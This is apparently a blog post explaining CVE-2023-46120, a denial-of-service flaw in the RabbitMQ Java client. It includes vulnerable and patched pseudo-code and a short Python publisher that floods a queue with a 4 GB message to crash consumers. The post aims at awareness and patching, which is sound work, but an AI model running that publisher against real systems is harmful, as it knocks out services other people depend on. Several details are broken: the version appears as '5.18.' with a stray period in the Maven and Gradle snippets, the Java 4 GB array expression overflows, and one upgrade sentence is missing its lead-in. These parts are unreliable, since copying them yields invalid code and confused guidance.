*Published: June 2024 | Author: rabbit_hacker*
RabbitMQ is a popular message broker, and its Java client library powers thousands of distributed systems. But a recent vulnerability with a clunky name—CVE-2023-46120—uncovered a simple, powerful flaw. With the right message, attackers could freeze, crash, or knock out applications that depend on the RabbitMQ Java client.
This post breaks down what happened, how it worked, includes code examples, references official resources, and finishes with practical advice.
[Resources](#resources)
1. What is CVE-2023-46120?
CVE-2023-46120 relates to the RabbitMQ Java client library, often used in Java and JVM-based systems to send and receive data through RabbitMQ.
Vulnerable Library: RabbitMQ Java client *before* 5.18.
- Affected Functionality: Receiving messages—the maxBodyLebgth (sic, correct spelling is maxBodyLength) property was ignored when pulling Message objects from the broker.
- Impact: Attackers can send massive messages, causing the client to allocate more memory than it can handle. This can crash the app with an Out Of Memory (OOM) Error, leading to Denial of Service (DoS) scenarios.
> "If you're running a Java consumer with default settings, someone on your network could crash your app with a single huge message." — CVE Report
2. How Did the Bug Happen?
RabbitMQ Java clients handle messages by reading data from the server. To keep things safe, they should respect the maxBodyLength setting, a safety valve to prevent extremely large messages from consuming all available memory.
The Problem:
When receiving a Message object, the maxBodyLength setting was not checked. This means anyone could submit a message of any size, and the client would blindly allocate enough memory for it.
Here’s what an unsafe message receive might look like (pseudo-code)
public Message receiveMessage(InputStream in) throws IOException {
int bodyLength = readInt(in); // ← Attacker controls this value!
byte[] body = new byte[bodyLength]; // ← Danger: huge allocation possible!
in.readFully(body);
// No check against maxBodyLength
return new Message(body);
}
What went wrong:
JVM tries to allocate huge byte array → OutOfMemoryError.
3. Simple Exploit Walkthrough
Attack Scenario:
Suppose an attacker can publish messages to a queue that your consumer listens to (not uncommon on internal networks).
The code tries to allocate a 4 GB Java array
`java
byte[] body = new byte[4 * 1024 * 1024 * 1024]; // 4GB!
Example Attack Code (Python Publisher)
import pika
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
# Create a gigantic message
huge_body = b"A" * (4 * 1024 * 1024 * 1024) # 4 GB message
channel.basic_publish(exchange='',
routing_key='test_queue',
body=huge_body)
connection.close()
Note: Sending a 4 GB message is slow and requires patching Python's amqp library for big sizes, but this demonstrates the logic. Even 256 MB could crash smaller consumers!
4. Fix & Patch Guide
The issue was patched in version 5.18. of the RabbitMQ Java client. The fix adds a check against maxBodyLength before allocating memory.
Patched Code Example (Simplified)
public Message receiveMessage(InputStream in) throws IOException {
int bodyLength = readInt(in);
if (bodyLength > maxBodyLength) {
throw new IOException("Body length " + bodyLength +
" exceeds the maxBodyLength setting!");
}
byte[] body = new byte[bodyLength];
in.readFully(body);
return new Message(body);
}
Update Now:
If not, upgrade immediately.
<dependency>
<groupId>com.rabbitmq</groupId>
<artifactId>amqp-client</artifactId>
<version>5.18.</version>
</dependency>
Or, with Gradle
implementation 'com.rabbitmq:amqp-client:5.18.'
5. Resources & References
- Official RabbitMQ Java Client: https://www.rabbitmq.com/java-client.html
RabbitMQ Security Advisories:
https://github.com/rabbitmq/rabbitmq-java-client/security/advisories/GHSA-h87v-fxvj-vx9w
GitHub Fix Commit:
https://github.com/rabbitmq/rabbitmq-java-client/pull/1005
NVD Record:
https://nvd.nist.gov/vuln/detail/CVE-2023-46120
Review your message size limits—don’t trust the network.
Stay safe and keep patching! If you have questions or want mitigation tips, let me know in the comments below.
*This article is exclusively crafted for readers seeking simple, actionable information about CVE-2023-46120 and its real-world impact on RabbitMQ Java client systems.*
Timeline
Published on: 10/25/2023 18:17:00 UTC
Last modified on: 11/01/2023 16:42:00 UTC